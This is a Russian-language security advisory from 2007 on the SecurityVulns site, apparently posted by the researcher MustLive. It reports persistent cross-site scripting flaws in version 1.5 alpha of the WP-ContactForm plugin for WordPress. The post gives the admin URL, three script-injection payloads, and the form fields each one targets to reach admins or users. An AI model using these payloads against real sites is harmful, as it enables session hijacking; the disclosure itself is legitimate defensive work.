Информационная безопасность
[RU] switch to
English Version

  

Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Multiple xss in mambo 4.6.2

  PHP Security Framework: Vuln and Security Bypass

  Uber Uploader <= 5.3.6 Remote File Upload Vulnerability

  SurgeMail v.38k4 webmail Host header crash

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:18 декабря 2007 г.
Subject:XSS vulnerabilities in WP-ContactForm

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в WP-ContactForm. Это плагин для WordPress.

Данные уязвимости - это persistent XSS. Уязвима версия плагина WP-ContactForm 1.5 alpha (и предыдущие).

Ранее я уже писал про уязвимости в WP-ContactForm (http://websecurity.com.ua/948/) (в оригинальной версии) и в новой версии плагина (сделанной другим автором) - WP-ContactForm CAPTCHA bypass (http://websecurity.com.ua/1599/) и XSS in WP-ContactForm (http://websecurity.com.ua/1600/).

XSS:

POST запрос на странице http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php:

"><script>alert(document.cookie)</script>
В полях: E-mail Address, Subject - для атаки только на админа.

<script>alert(document.cookie)</script>
В полях: Success Message, Error Message - для атаки на пользователей.

</textarea><script>alert(document.cookie)</script>
В полях: Success Message, Error Message - для атаки на админа и на пользователей.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1641/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru